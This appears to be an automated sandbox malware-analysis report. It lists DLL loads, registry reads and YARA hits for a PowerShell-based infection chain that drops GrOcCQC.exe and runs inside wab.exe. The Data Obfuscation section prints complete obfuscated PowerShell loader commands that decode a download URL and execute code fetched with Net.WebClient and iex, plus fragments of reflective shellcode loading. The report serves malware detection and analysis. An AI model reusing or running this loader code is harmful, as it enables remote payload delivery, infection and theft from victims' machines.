            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: version.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exeSection loaded: cryptdlg.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exeSection loaded: msoert2.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exeSection loaded: msimg32.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exeSection loaded: cryptui.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exeSection loaded: msftedit.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exeSection loaded: explorerframe.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exeSection loaded: actxprxy.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exeSection loaded: cryptdlg.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exeSection loaded: msoert2.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exeSection loaded: msimg32.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exeSection loaded: cryptui.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exeSection loaded: msftedit.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exeSection loaded: explorerframe.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3743-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
            Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exeFile opened: C:\Windows\SysWOW64\msftedit.dllJump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
            Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000D.00000002.878914102008.0000000007121000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdb source: powershell.exe, 0000000D.00000002.878904636075.0000000002A96000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: re.pdb; source: powershell.exe, 0000000D.00000002.878917749751.0000000008791000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdbk source: powershell.exe, 0000000D.00000002.878904636075.0000000002A96000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wab.pdbGCTL source: GrOcCQC.exe, 00000010.00000000.879000905723.00000000007E1000.00000020.00000001.01000000.00000009.sdmp, GrOcCQC.exe, 00000012.00000002.879083099115.00000000007E1000.00000020.00000001.01000000.00000009.sdmp, GrOcCQC.exe.15.dr
            Source: Binary string: wab.pdb source: GrOcCQC.exe, GrOcCQC.exe, 00000010.00000000.879000905723.00000000007E1000.00000020.00000001.01000000.00000009.sdmp, GrOcCQC.exe, 00000012.00000002.879083099115.00000000007E1000.00000020.00000001.01000000.00000009.sdmp, GrOcCQC.exe.15.dr

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 0000000D.00000002.878919425134.0000000008CCF000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.878918969194.0000000008A70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Discophile)$global:Refracting = [System.Text.Encoding]::ASCII.GetString($Joviality)$global:Effected=$Refracting.substring($Pushmina119,$Faseforvrngning)<#sundayproof costlew Semidito
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Unmortised252 $Forgodtbefindendets $Bilaan), (Sandsynliggrer @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Nonvillager = [AppDomain]::CurrentDomain.GetAs
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($kantning)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Bifurcations, $false).DefineType($realeksaminen,
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Discophile)$global:Refracting = [System.Text.Encoding]::ASCII.GetString($Joviality)$global:Effected=$Refracting.substring($Pushmina119,$Faseforvrngning)<#sundayproof costlew Semidito
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Nugacities Komedianter104 Palatalise Hygiejnekommsionens Redesignating Ungrubbed Fondshandler Fiskeflaaderne Discophile Curarize Anmeldtes Refracting Hellenizer Teknologipolitiks Generalstabskorts Dubitate Blodfattigheds Helcology Cavillation Fallesen Alouatta Vitial Unemptiable Datasikkerheds Nugacities Komedianter104 Palatalise Hygiejnekommsionens Redesignating Ungrubbed Fondshandler Fiskeflaaderne Discophile Curarize Anmeldtes Refracting Hellenizer Teknologipolitiks Generalstabskorts Dubitate Blodfattigheds Helcology Cavillation Fallesen Alouatta Vitial Unemptiable Datasikkerheds';If (${host}.CurrentCulture) {$Smaastykker++;}Function Immatrikulationens($Marios){$Syntomy=$Marios.Length-$Smaastykker;$Pronenesses='SUBsTRI';$Pronenesses+='ng';For( $Dipsomaniacs=2;$Dipsomaniacs -lt $Syntomy;$Dipsomaniacs+=3){$Nugacities+=$Marios.$Pronenesses.Invoke( $Dipsomaniacs, $Smaastykker);}$Nugacities;}function Influerende($Svippedes){ . ($Gnier111) ($Svippedes);}$Sclaffs=Immatrikulationens 'HuMN,oGazHuiKal,elBeaDa/p,5La.Fr0Ru He(A WPuiCun UdKuo .wSls l .N sTEp Li1 B0Fy.P,0.y;I. .eWCaiB,nS,6Di4Te;Vi Bx,o6E.4,i;No BurUlvGl:Un1Co2Sy1D.. U0 n)Sw IGSceV c.hkCyoNo/ C2Ch0cu1tr0di0Ko1Dr0Pe1Li AwF.ni drAreOrfT.oSixCo/R 1 2Re1 J.So0.a ';$Dissers=Immatrikulationens 'G U Es ne .r,e-IdA agEmeS,nSttso ';$Redesignating=Immatrikulationens ' RhAft CtBepS sKu:Va/ P/ .datrUdiF,vOveSa. UgTaoSko,eg UlSoeCa.Syc Uo emVe/,euBecKr?D,eCoxI,p Ko ,r StIn=,edIro .wK.n.el,roChagld.a&Fristd.e=Ac1N,T uTaX o3InpKaGRoV .QOmO Mu AYReuD.NOv0UnPMoVFifA.0s.S ,1PrvChuSaO,eoK.v,uPV,ZVacE 7Ar6PhtUd5 ';$Bourre=Immatrikulationens 's,>I ';$Gnier111=Immatrikulationens 'FriSke Ix ';$Hoodwinked='Fiskeflaaderne';$Parastades = Immatrikulationens ' FeGacF,h Fo,r .l%K.a epAlpSpdJiaOutPeaU,%,l\FrBMoe ol YlAteT rKiiPacUn7C.4 F.G,AB,f RsEk Fo&St&K, HeCyc DhKloCo U.t n ';Influerende (Immatrikulationens 'Ti$ExgAllIdoHubbea Klsa: .CDehJeaHecSpoCun Nn FeGur Us J1 S7A,2.v=Be(CacCamMadS Si/TucEx Co$P.PTwaSirDeas.s,ft AaAedReeKosPe),r ');Influerende (Immatrikulationens 'Sn$S.g OlCuoFobTuanolL :KrHKoyBag .iDieI,jUnnSke uk Oo amVemEksMii oo .nUbeDenUdsW,= T$DeRJae.jd Ee .sBiiIngOpn,saYat riSonFeg T.C.s.vpB.lGei StUn(Fa$ UB o Au.tr FrByeP.) ');Influerende (Immatrikulationens ' T[ IN ieUrtPs.P S,beRer Iv .iTicReeDuPPlo iiAfno,tLiMS,aLin Ta hg MeKorDi]no:Fi: SPre,gcS,uTir iUnt,eyAmPBrrCeo etTroUscstoSvl E ,o= T I [AnNDreUnt.k.F SDeeWecTuu .r.hi ,t,myAtP.tr SoHitFooM,cDuo lUnT.uy ApSle r] l:s.: ,TOflsmsPa1Un2 A ');$Redesignating=$Hygiejnekommsionens[0];$Fangstbaaden190= (Immatrikulationens 'Am$,igUnlhaoEqbKla.al,e:.lKcooSun ,sFoe rk MvTeec,nL,tHjePosOs=.mNFieOpwS -W,O ab .jBleIncDetCa thS PyResAntTee .mMu.EpN KeP.t a.S,WSoe,ebOvC .lFaiKbeA.nLkt');$Fangstbaaden190+=$Chaconners172[1];Influerende ($Fangstbaaden190);Influerende (Immatrikulationens 'Ar$ToKFooKvnOvsK.edok,
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Nugacities Komedianter104 Palatalise Hygiejnekommsionens Redesignating Ungrubbed Fondshandler Fiskeflaaderne Discophile Curarize Anmeldtes Refracting Hellenizer Teknologipolitiks Generalstabskorts Dubitate Blodfattigheds Helcology Cavillation Fallesen Alouatta Vitial Unemptiable Datasikkerheds Nugacities Komedianter104 Palatalise Hygiejnekommsionens Redesignating Ungrubbed Fondshandler Fiskeflaaderne Discophile Curarize Anmeldtes Refracting Hellenizer Teknologipolitiks Generalstabskorts Dubitate Blodfattigheds Helcology Cavillation Fallesen Alouatta Vitial Unemptiable Datasikkerheds';If (${host}.CurrentCulture) {$Smaastykker++;}Function Immatrikulationens($Marios){$Syntomy=$Marios.Length-$Smaastykker;$Pronenesses='SUBsTRI';$Pronenesses+='ng';For( $Dipsomaniacs=2;$Dipsomaniacs -lt $Syntomy;$Dipsomaniacs+=3){$Nugacities+=$Marios.$Pronenesses.Invoke( $Dipsomaniacs, $Smaastykker);}$Nugacities;}function Influerende($Svippedes){ . ($Gnier111) ($Svippedes);}$Sclaffs=Immatrikulationens 'HuMN,oGazHuiKal,elBeaDa/p,5La.Fr0Ru He(A WPuiCun UdKuo .wSls l .N sTEp Li1 B0Fy.P,0.y;I. .eWCaiB,nS,6Di4Te;Vi Bx,o6E.4,i;No BurUlvGl:Un1Co2Sy1D.. U0 n)Sw IGSceV c.hkCyoNo/ C2Ch0cu1tr0di0Ko1Dr0Pe1Li AwF.ni drAreOrfT.oSixCo/R 1 2Re1 J.So0.a ';$Dissers=Immatrikulationens 'G U Es ne .r,e-IdA agEmeS,nSttso ';$Redesignating=Immatrikulationens ' RhAft CtBepS sKu:Va/ P/ .datrUdiF,vOveSa. UgTaoSko,eg UlSoeCa.Syc Uo emVe/,euBecKr?D,eCoxI,p Ko ,r StIn=,edIro .wK.n.el,roChagld.a&Fristd.e=Ac1N,T uTaX o3InpKaGRoV .QOmO Mu AYReuD.NOv0UnPMoVFifA.0s.S ,1PrvChuSaO,eoK.v,uPV,ZVacE 7Ar6PhtUd5 ';$Bourre=Immatrikulationens 's,>I ';$Gnier111=Immatrikulationens 'FriSke Ix ';$Hoodwinked='Fiskeflaaderne';$Parastades = Immatrikulationens ' FeGacF,h Fo,r .l%K.a epAlpSpdJiaOutPeaU,%,l\FrBMoe ol YlAteT rKiiPacUn7C.4 F.G,AB,f RsEk Fo&St&K, HeCyc DhKloCo U.t n ';Influerende (Immatrikulationens 'Ti$ExgAllIdoHubbea Klsa: .CDehJeaHecSpoCun Nn FeGur Us J1 S7A,2.v=Be(CacCamMadS Si/TucEx Co$P.PTwaSirDeas.s,ft AaAedReeKosPe),r ');Influerende (Immatrikulationens 'Sn$S.g OlCuoFobTuanolL :KrHKoyBag .iDieI,jUnnSke uk Oo amVemEksMii oo .nUbeDenUdsW,= T$DeRJae.jd Ee .sBiiIngOpn,saYat riSonFeg T.C.s.vpB.lGei StUn(Fa$ UB o Au.tr FrByeP.) ');Influerende (Immatrikulationens ' T[ IN ieUrtPs.P S,beRer Iv .iTicReeDuPPlo iiAfno,tLiMS,aLin Ta hg MeKorDi]no:Fi: SPre,gcS,uTir iUnt,eyAmPBrrCeo etTroUscstoSvl E ,o= T I [AnNDreUnt.k.F SDeeWecTuu .r.hi ,t,myAtP.tr SoHitFooM,cDuo lUnT.uy ApSle r] l:s.: ,TOflsmsPa1Un2 A ');$Redesignating=$Hygiejnekommsionens[0];$Fangstbaaden190= (Immatrikulationens 'Am$,igUnlhaoEqbKla.al,e:.lKcooSun ,sFoe rk MvTeec,nL,tHjePosOs=.mNFieOpwS -W,O ab .jBleIncDetCa thS PyResAntTee .mMu.EpN KeP.t a.S,WSoe,ebOvC .lFaiKbeA.nLkt');$Fangstbaaden190+=$Chaconners172[1];Influerende ($Fangstbaaden190);Influerende (Immatrikulationens 'Ar$ToKFooKvnOvsK.edok,
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Nugacities Komedianter104 Palatalise Hygiejnekommsionens Redesignating Ungrubbed Fondshandler Fiskeflaaderne Discophile Curarize Anmeldtes Refracting Hellenizer Teknologipolitiks Generalstabskorts Dubitate Blodfattigheds Helcology Cavillation Fallesen Alouatta Vitial Unemptiable Datasikkerheds Nugacities Komedianter104 Palatalise Hygiejnekommsionens Redesignating Ungrubbed Fondshandler Fiskeflaaderne Discophile Curarize Anmeldtes Refracting Hellenizer Teknologipolitiks Generalstabskorts Dubitate Blodfattigheds Helcology Cavillation Fallesen Alouatta Vitial Unemptiable Datasikkerheds';If (${host}.CurrentCulture) {$Smaastykker++;}Function Immatrikulationens($Marios){$Syntomy=$Marios.Length-$Smaastykker;$Pronenesses='SUBsTRI';$Pronenesses+='ng';For( $Dipsomaniacs=2;$Dipsomaniacs -lt $Syntomy;$Dipsomaniacs+=3){$Nugacities+=$Marios.$Pronenesses.Invoke( $Dipsomaniacs, $Smaastykker);}$Nugacities;}function Influerende($Svippedes){ . ($Gnier111) ($Svippedes);}$Sclaffs=Immatrikulationens 'HuMN,oGazHuiKal,elBeaDa/p,5La.Fr0Ru He(A WPuiCun UdKuo .wSls l .N sTEp Li1 B0Fy.P,0.y;I. .eWCaiB,nS,6Di4Te;Vi Bx,o6E.4,i;No BurUlvGl:Un1Co2Sy1D.. U0 n)Sw IGSceV c.hkCyoNo/ C2Ch0cu1tr0di0Ko1Dr0Pe1Li AwF.ni drAreOrfT.oSixCo/R 1 2Re1 J.So0.a ';$Dissers=Immatrikulationens 'G U Es ne .r,e-IdA agEmeS,nSttso ';$Redesignating=Immatrikulationens ' RhAft CtBepS sKu:Va/ P/ .datrUdiF,vOveSa. UgTaoSko,eg UlSoeCa.Syc Uo emVe/,euBecKr?D,eCoxI,p Ko ,r StIn=,edIro .wK.n.el,roChagld.a&Fristd.e=Ac1N,T uTaX o3InpKaGRoV .QOmO Mu AYReuD.NOv0UnPMoVFifA.0s.S ,1PrvChuSaO,eoK.v,uPV,ZVacE 7Ar6PhtUd5 ';$Bourre=Immatrikulationens 's,>I ';$Gnier111=Immatrikulationens 'FriSke Ix ';$Hoodwinked='Fiskeflaaderne';$Parastades = Immatrikulationens ' FeGacF,h Fo,r .l%K.a epAlpSpdJiaOutPeaU,%,l\FrBMoe ol YlAteT rKiiPacUn7C.4 F.G,AB,f RsEk Fo&St&K, HeCyc DhKloCo U.t n ';Influerende (Immatrikulationens 'Ti$ExgAllIdoHubbea Klsa: .CDehJeaHecSpoCun Nn FeGur Us J1 S7A,2.v=Be(CacCamMadS Si/TucEx Co$P.PTwaSirDeas.s,ft AaAedReeKosPe),r ');Influerende (Immatrikulationens 'Sn$S.g OlCuoFobTuanolL :KrHKoyBag .iDieI,jUnnSke uk Oo amVemEksMii oo .nUbeDenUdsW,= T$DeRJae.jd Ee .sBiiIngOpn,saYat riSonFeg T.C.s.vpB.lGei StUn(Fa$ UB o Au.tr FrByeP.) ');Influerende (Immatrikulationens ' T[ IN ieUrtPs.P S,beRer Iv .iTicReeDuPPlo iiAfno,tLiMS,aLin Ta hg MeKorDi]no:Fi: SPre,gcS,uTir iUnt,eyAmPBrrCeo etTroUscstoSvl E ,o= T I [AnNDreUnt.k.F SDeeWecTuu .r.hi ,t,myAtP.tr SoHitFooM,cDuo lUnT.uy ApSle r] l:s.: ,TOflsmsPa1Un2 A ');$Redesignating=$Hygiejnekommsionens[0];$Fangstbaaden190= (Immatrikulationens 'Am$,igUnlhaoEqbKla.al,e:.lKcooSun ,sFoe rk MvTeec,nL,tHjePosOs=.mNFieOpwS -W,O ab .jBleIncDetCa thS PyResAntTee .mMu.EpN KeP.t a.S,WSoe,ebOvC .lFaiKbeA.nLkt');$Fangstbaaden190+=$Chaconners172[1];Influerende ($Fangstbaaden190);Influerende (Immatrikulationens 'Ar$ToKFooKvnOvsK.edok,Jump to behavior
